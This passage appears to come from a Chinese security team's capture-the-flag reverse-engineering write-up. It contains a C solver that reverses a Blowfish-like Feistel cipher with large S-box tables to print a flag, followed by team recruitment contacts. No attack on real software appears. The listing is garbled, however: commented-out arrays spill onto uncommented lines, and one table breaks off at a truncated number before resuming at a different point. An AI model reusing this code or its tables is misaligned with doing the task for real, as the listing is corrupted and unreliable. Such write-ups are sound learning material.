385448568, 2281522429, 2353434491, 4257643385, 3195978567, 2430535998, 4199278647, 2220852705,
4036574498, 2262945714, 4170187289, 776412985, 4124210120, 239033054, 3968939686, 1929753233,
173853027, 1406407725, 3941693692, 796725757, 3144650892, 3503708025, 2776022674, 1938751635,
1248847972, 2608994359, 851921828, 1516411021, 1683816190, 2338696425, 3757199265, 178571885,
4028236048, 3667081067, 2717910895, 2244146045, 1642947711, 1423780774, 749248876, 4272358479,
3180443602, 3289651094, 2591430980, 896035799, 1914818214, 2664938025, 3540626352, 3906500822,
3857870005, 3462588037, 572636384, 1418195159, 3684107302, 3709260110, 3222399255, 1412646536,
3413802766, 2772059040, 2783378183, 1330820273, 1282668134, 32527697, 3701229580, 1986560844,
349120310, 2382511834, 2292698503, 2173225989, 4285986350, 1130513268, 3346150625, 2259836169,
3929769216, 3647181410, 1519130162, 87748607, 2733551963, 2709923326, 403631292, 1765618983,
2108202029, 3319220774, 208422213, 2533405018, 130602663, 2992361376, 3203909780, 2954253679,
2833769228, 1196155445, 2624905029, 58158346, 406029448, 1075869660, 1062768470, 646174447,
246825350, 3323108458, 2087338216, 329356675, 486795463, 857075742, 1310319795, 1425704113,
1133084413, 2813304446, 2116197744, 789924438, 4278930869, 638107207, 3678293965, 2092667206,
89794413, 2338500461, 2891216521, 4093119634, 715895208, 832322804, 1353661512, 3477813964,
512982170, 1516778567, 238161820, 2538910274, 1298642056, 1961458426, 906844823, 1435007454,
3082866898, 3889652977, 133149898, 3646853904, 2444699146, 1038682641, 2690761423, 2348092183,
3918791193, 3967085231, 2271756042, 4262278839, 2584709943, 3014727665, 513192404, 3279689267,
3807058297, 3251022180, 582131098, 1234331602, 3691068172, 3961315345, 2342571110, 3297560873,
1051581287, 23277464, 1948450009, 3124254968, 3565802147, 1930404567, 3282282787, 2226197055,
3413978209, 2461586429, 3148013157, 425596849, 3680505353, 3228740810, 2311485154, 363598425,
853879466, 3570971279, 1459843144, 3414962580, 2853247141, 1419118134, 3318660049, 2832031686,
505000282, 3283805587, 3838471692, 1063029572, 3505139932, 2522219181, 216313596, 4116288738,
2639721842, 3107550641, 220289618, 3970170052, 2804922372, 1554498005, 3953620235, 1724968977,
2482737094, 3307754745, 2588408380, 315900071, 3320870247, 3052124838, 3429188486, 100864008,
3133659962, 694581523, 3839618974, 19304293, 2467286314, 3229326167, 2305058656, 425245302,
1460822187, 3479947371, 1775425452, 2748315998, 2809396963, 2903577382, 2879049479, 3335132732,
2984379717, 828009529, 399374814, 3327048549, 1193843085, 4266483639, 1929458055, 3348829559,
3257744350, 1193522928, 3573988769, 3473247351, 2122441385, 1034745120, 3638607549, 2280534042,
441318120, 1611805658, 183435220, 1894620779, 187018605, 3804410878, 2181248765, 3489213213,
304389047, 1031726894, 713289271, 2493008349, 3135758367, 70816160, 5376726, 1155600499,
2296039829, 1231182590, 3819326726, 1294936807, 376644566, 1191222656, 3369224278, 2735641838,
2344901511, 97781287, 2802518024, 2772748251, 1918306957, 2849480005, 1354956038, 659872705,
3085158128, 3145559048, 1414595956, 3475240780, 3139219739, 2259098988, 4266094556, 217675350,
1179367358, 3697328045, 2782967266, 3352559254, 1960696074, 3686944166, 1895840813, 304048976,
1343378469, 2719183224, 2453142435, 2098196276, 2748180570, 2474317353, 3582692056, 1541844022,
4250380399, 2322441973, 971352176, 2882404465, 4202231056, 3056881346, 2879145718, 3282630858,
2586773008, 3403124075 };
uint32_t ans[72] = { 2349853232, 683184685, 2245047130, 3954499188, 2775460568, 2026269219,
474509143, 2953044360, 912170758, 1801531562, 3887048238, 401602842, 3227670935, 2936374891,
4215643595, 984249622, 394855348, 3516186580 };
uint32_t sub_452304(uint32_t a2)
{
uint32_t a= ans1[(3072 + 4 * (a2 & 0xff)) / 4] + (ans1[(2048 + 4 * ((a2 >> 8) & 0xff)) / 4]
^ (ans1[(1024 + 4 * ((a2 >> 16) & 0xff)) / 4] + ans1[(4 * ((a2 >> 24) & 0xff)) / 4]));
return a;
}
void decrypt(uint32_t* temp)
{
temp[0] ^= ans[64 / 4];
temp[1] ^= ans[68 / 4];
for (int i = 7; i >= 0; i--)
{
temp[0] ^= sub_452304(temp[1]);
temp[1] ^= ans[(8 * i + 4) / 4];
temp[1] ^= sub_452304(temp[0]);
temp[0] ^= ans[(8 * i) / 4];
}
}
int main()
{
//uint32_t ans[72] = {2349853232, 683184685, 2245047130, 3954499188, 2775460568, 2026269219,
474509143, 2953044360, 912170758, 1801531562, 3887048238, 401602842, 3227670935, 2936374891,
4215643595, 984249622, 394855348, 3516186580};
uint32_t encode[4] = { 0x9550e250,0x11a51f04,0xf1632b47,0x8f17e16c};
// uint32_t ans1[1024] = {3612299254, 909017393, 3176992461, 3316901652, 2609835858,
2796138362, 3652223468, 4026124070, 4005344247, 3018204662, 3971881576, 1883703289, 3380028605,
2310268358, 3192089339, 3865334851, 991473981, 4261573226, 3513563506, 3274279743, 4056254897,
393233045, 3857783913, 3209970495, 3545254565, 1726489627, 2617077090, 536406376, 2185599772,
810099132, 3109160618, 2098277993, 592628296, 3835560518, 1236356276, 2806853253, 3386832562,
2875662589, 1716755816, 1338756477, 135048504, 3661026591, 985113045, 3225175390, 3059325024,
947849520, 1317660494, 437204192, 2901243097, 3844245920, 120516819, 3690592916, 1742621374,
961341586, 82579909, 2602161357, 688080856, 1834854888, 1205398077, 1803263324, 3278861203,
1118662528, 2233320600, 1503686121, 3021908902, 169435313, 4132028466, 3591033800, 604594897,
1387163463, 3610184282, 82732284, 3734169552, 26558337, 3263666052, 1675780680, 1245030056,
4023753971, 3106900708, 1161959714, 1921670186, 2139379863, 3111216585, 144875354, 3891556883,
2915976098, 1543965061, 3180167923, 2907634212, 706636810, 2809431891, 3339771535, 3003842848,
666170416, 2214373859, 3719315293, 1191578267, 2426783095, 3079199401, 1830926746, 3204220640,
3731036918, 1660271787, 492612286, 2570398579, 3227925737, 3774103751, 1359649358, 3445737257,
2401180843, 1760303728, 3485791200, 472932926, 3753885968, 4161071017, 2648262891, 262921962,
2374085492, 2248303185, 390396083, 2712543590, 2161070294, 174295997, 3158425513, 940358329,
1878094520, 3005772882, 3959545626, 2147432275, 938305420, 1663595663, 235114013, 165426881,
1434286583, 397714971, 3286531863, 3890683405, 2503783237, 3156100839, 1862835550, 2877364194,
2360580686, 2946284660, 1773107797, 1704357043, 970020583, 3671336424, 2997981521, 2379920259,
4265442517, 925584979, 2425516426, 2121507294, 3583831078, 950172452, 3859984899, 2852403993,
2834441141, 3757363531, 239582191, 1408912961, 3290831151, 810650838, 151049394, 3826060979,
7664562, 1203440678, 756917008, 1270613790, 1462665932, 3976216079, 2201884704, 1198888899,
1862145384, 1842954329, 3254547884, 3352184565, 1559929120, 2732851026, 3472229415, 3324261065,
1912193298, 1520363419, 1013564590, 2466244710, 3515836733, 3290010742, 1475359871, 2469026558,
265453838, 3764144433, 1951032479, 1789095261, 882704806, 2080169719, 1355828509, 216692911,
2077881151, 2179175345, 658329417, 2639415873, 1608429810, 2328829540, 3922963539, 3590750574,
3005810895, 3054927960, 3145751839, 2438530629, 3178227540, 2656268540, 2918949977, 2025459779,
702388526, 352396826, 2845512848, 3136351238, 582022810, 942471529, 2425653069, 4060440851,
1489288468, 2812878567, 1690137298, 3825703696, 2033813973, 2840178772, 3205759263, 3158390194,
4194323040, 2773043817, 633123956, 78997677, 3806715992, 157202888, 2479881715, 3347034983,
4027390473, 676130488, 559181126, 1893767750, 3132813806, 1737160727, 3039073421, 1904851998,
2726372549, 1482038449, 1772371038, 1399137205, 502080223, 1158624194, 1959469547, 2125030951,
1146241092, 136874116, 3312727756, 3123845189, 1616952983, 1116822306, 1447890576, 798589893,
2759565721, 2635262896, 267525495, 969441731, 3528824463, 2723329496, 3988026719, 3069802268,
3904044072, 1247175377, 3018910654, 1144761192, 1693003556, 653667911, 1322824793, 2685461955,
3423544340, 3895206564, 1263613072, 484014289, 4002680300, 82525547, 3713365205, 2785407392,
3203680529, 568074554, 2948600661, 690536872, 3761766135, 4093211731, 3026577007, 3623968899,
3114714815, 1660107032, 1630017735, 4015244569, 795121368, 181611949, 2302983550, 299228304,
1035595335, 4107946561, 4248631138, 759316079, 3455675297, 1802306174, 1248446376, 2220813029,
1106431524, 2974149249, 913000283, 1101868625, 1963166077, 1204015669, 2936566510, 1849439059,
1188145533, 1970281242, 3473902661, 3605729351, 779644256, 317399433, 2294142642, 3187988184,
3234556957, 2451570191, 539845509, 4051034255, 4207789360, 918997589, 4024179045, 47092157,
3461478898, 219928750, 3174028876, 3798490823, 4236068923, 1733771380, 2213684509, 3418631303,
1791707244, 2954339021, 604474946, 715741480, 1538117713, 2018946469, 3133692790, 2057135452,
4081014361, 1737711834, 443814679, 3951854071, 1261695230, 3484936769, 811019382, 3431304140,
2125583415, 3242734973, 4068818582, 1140887881, 2754994089, 1849203727, 2776434143, 4101627524,
1104008366, 3343386008, 1690010785, 1589833538, 2830854046, 3005511388, 1327586722, 3365805672,
2894519128, 377014138, 3258751486, 682576491, 1144946337, 2527160065, 1145337453, 1543577757,
1661179461, 716027965, 2345828765, 3765457141, 3719354469, 3575166803, 674417138, 2258687374,
4034399391, 3447359359, 4155138269, 2155299098, 1682039011, 3063342633, 97543685, 3653422538,
2954039847, 2269743455, 2661523390, 436334478, 1525296779, 1449357693, 4202155545, 1935437360,
3296147951, 2570170770, 1361243263, 2810328459, 3126080089, 3862996957, 1501245806, 146428735,
1286347126, 1666807071, 2983557661, 3352824585, 2918359338, 1936219053, 3034276746, 4001013798,
2185013997, 1018960196, 505963722, 560767059, 602988785, 800926720, 4165486503, 85828300,
3227976635, 649010145, 1125597870, 966697127, 167433808, 874570896, 3458750878, 3395258985,
252088262, 4222815752, 2639595847, 823198564, 486454327, 833313397, 205508261, 2786404808,
2510035198, 733713357, 1354849271, 3215264880, 1669427806, 1452787206, 3301133258, 3020307851,
2543834212, 1483052027, 2983195960, 3960532648, 3326718810, 1483969807, 1747416431, 1426364238,
1473516291, 3546046313, 376764897, 1169008197, 4294111582, 1594224422, 2284959488, 896177674,
204425518, 2774265376, 3033824452, 2439216892, 4053408298, 1693000377, 2609129969, 3032619608,
308898488, 3702536945, 977921220, 2735144083, 670850509, 2980849390, 1060995153, 1355919448,
1635397140, 4088809980, 1420233277, 663910423, 2710634922, 383964395, 4181644457, 2052912767,
3955690015, 645774729, 3320447412, 525766475, 3072324203, 2984772920, 608845350, 1847968149,
1506522579, 1499948296, 1132257855, 3799040339, 2104379384, 1857522470, 4264354361, 13542311,
4105907176, 916156479, 3593386610, 2662026461, 1622743063, 105136493, 2412473138, 4064549266,
3123460414, 3921011079, 718464174, 278010642, 2894547666, 1832841070, 3833519489, 2789630359,
3932469301, 314230278, 843881168, 1591227520, 2173809348, 1802556348, 3426041307, 3571278871,
130404080, 582313559, 1068143687, 3081884854, 85711274, 3891579692, 2539344878, 1011763299,
266906039, 355962384, 3286276118, 862412479, 2027782370, 3255596042, 607628161, 1009421605,
2722485621, 4288910093, 475523691, 1238990637, 3029919481, 1227651643, 457015533, 453798348,
4137614187, 286748010, 2948221670, 147673401, 2618102637, 1554248227, 67648155, 1534379566,
4269591083, 2170536445, 2387217625, 3192685544, 3879696649, 3276561223, 450492746, 4040053455,
893402262, 110762684, 454018881, 3993940863, 2619682979, 2392445782, 1975308775, 2633142153,
1099704695, 3660468837, 1356389045, 4235162877, 3156792154, 2167871338, 1325276422, 477945007,
1015766725, 312791145, 1919976644, 2536378684, 3553880401, 1245281630, 1723424489, 4242078577,
127882815, 2076642282, 2897062914, 3422554873, 2511825743, 3279714577, 676398387, 2477683067,
2690393167, 1557866509, 2377366658, 1833176462, 1867241793, 1728770188, 2030196186, 487071513,
2557723795, 126875659, 3310563015, 832818887, 1279107586, 1189176266, 402509529, 3673978930,
3562678424, 1101937332, 1433686036, 2828533185, 2344180009, 2360208424, 2067254040, 2605496877,
2633778875, 1374180181, 958478401, 3769939655, 3095119178, 3404498833, 3498729428, 2919725926,
3899615018, 1622936878, 1714950277, 1416079787, 1028838279, 2370886484, 1179276667, 3630483254,
2211301498, 3110750966, 3842377908, 2062040230, 616149483, 51223745, 661298142, 1348065750,
3529860603, 2758213304, 193574778, 1229799653, 3471014957, 865196813, 2981594497, 3144691620,
45598418, 1428776199, 2981650001, 886009176, 1673674753, 2482633515, 835001229, 356110831,
1862373254, 4053415012, 924842823, 1325083506, 2566709663, 476044749, 862582026, 403946608,
981948886, 95040438, 2896276803, 1660022945, 4205568328, 3074709622, 3526601780, 1968748706,
3098387267, 1212705143, 1764694666, 192896265, 2191766229, 1432204716, 1288310487, 380336587,
2713303837, 1410063421, 79079056, 1138884246, 1300812639, 2241915529, 983867098, 1692596682,
3376239816, 3909096113, 671223618, 1578759049, 2882967937, 1013691809, 2770998440, 15399867,
796952286, 2381001978, 118957219, 349371860, 3509336758, 3550298454, 3983933129, 2431510086,
2754122191, 609900711, 3886727998, 880847986, 213232128, 910454213, 2459776557, 1942498188,
1669211226, 385448568, 2281522429, 2353434491, 4257643385, 3195978567, 2430535998, 4199278647,
2220852705, 4036574498, 2262945714, 4170187289, 776412985, 4124210120, 239033054, 3968939686,
1929753233, 173853027, 1406407725, 3941693692, 796725757, 3144650892, 3503708025, 2776022674,
1938751635, 1248847972, 2608994359, 851921828, 1516411021, 1683816190, 2338696425, 3757199265,
178571885, 4028236048, 3667081067, 2717910895, 2244146045, 1642947711, 1423780774, 749248876,
4272358479, 3180443602, 3289651094, 2591430980, 896035799, 1914818214, 2664938025, 3540626352,
3906500822, 3857870005, 3462588037, 572636384, 1418195159, 3684107302, 3709260110, 3222399255,
1412646536, 3413802766, 2772059040, 2783378183, 1330820273, 12
1435007454, 3082866898, 3889652977, 133149898, 3646853904, 2444699146, 1038682641, 2690761423,
2348092183, 3918791193, 3967085231, 2271756042, 4262278839, 2584709943, 3014727665, 513192404,
3279689267, 3807058297, 3251022180, 582131098, 1234331602, 3691068172, 3961315345, 2342571110,
3297560873, 1051581287, 23277464, 1948450009, 3124254968, 3565802147, 1930404567, 3282282787,
2226197055, 3413978209, 2461586429, 3148013157, 425596849, 3680505353, 3228740810, 2311485154,
363598425, 853879466, 3570971279, 1459843144, 3414962580, 2853247141, 1419118134, 3318660049,
2832031686, 505000282, 3283805587, 3838471692, 1063029572, 3505139932, 2522219181, 216313596,
4116288738, 2639721842, 3107550641, 220289618, 3970170052, 2804922372, 1554498005, 3953620235,
1724968977, 2482737094, 3307754745, 2588408380, 315900071, 3320870247, 3052124838, 3429188486,
100864008, 3133659962, 694581523, 3839618974, 19304293, 2467286314, 3229326167, 2305058656,
425245302, 1460822187, 3479947371, 1775425452, 2748315998, 2809396963, 2903577382, 2879049479,
3335132732, 2984379717, 828009529, 399374814, 3327048549, 1193843085, 4266483639, 1929458055,
3348829559, 3257744350, 1193522928, 3573988769, 3473247351, 2122441385, 1034745120, 3638607549,
2280534042, 441318120, 1611805658, 183435220, 1894620779, 187018605, 3804410878, 2181248765,
3489213213, 304389047, 1031726894, 713289271, 2493008349, 3135758367, 70816160, 5376726,
1155600499, 2296039829, 1231182590, 3819326726, 1294936807, 376644566, 1191222656, 3369224278,
2735641838, 2344901511, 97781287, 2802518024, 2772748251, 1918306957, 2849480005, 1354956038,
659872705, 3085158128, 3145559048, 1414595956, 3475240780, 3139219739, 2259098988, 4266094556,
217675350, 1179367358, 3697328045, 2782967266, 3352559254, 1960696074, 3686944166, 1895840813,
304048976, 1343378469, 2719183224, 2453142435, 2098196276, 2748180570, 2474317353, 3582692056,
1541844022, 4250380399, 2322441973, 971352176, 2882404465, 4202231056, 3056881346, 2879145718,
3282630858, 2586773008, 3403124075};
uint32_t temp[2] = { 0 };
for (int i = 0; i < 4; i += 2)
{
temp[0] = encode[i];
temp[1] = encode[i + 1];
decrypt(temp);
printf("%c%c%c%c%c%c%c%c", *((char*)&temp[0] + 3), *((char*)&temp[0] + 2), *
((char*)&temp[0] + 1), *((char*)&temp[0] + 0), *((char*)&temp[1] + 3), *((char*)&temp[1] + 2), *
((char*)&temp[1] + 1), *((char*)&temp[1] + 0));
}
}
文末:
欢迎师傅们加入我们:
星盟安全团队纳新群1:222328705
星盟安全团队纳新群2:346014666
有兴趣的师傅欢迎一起来讨论!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论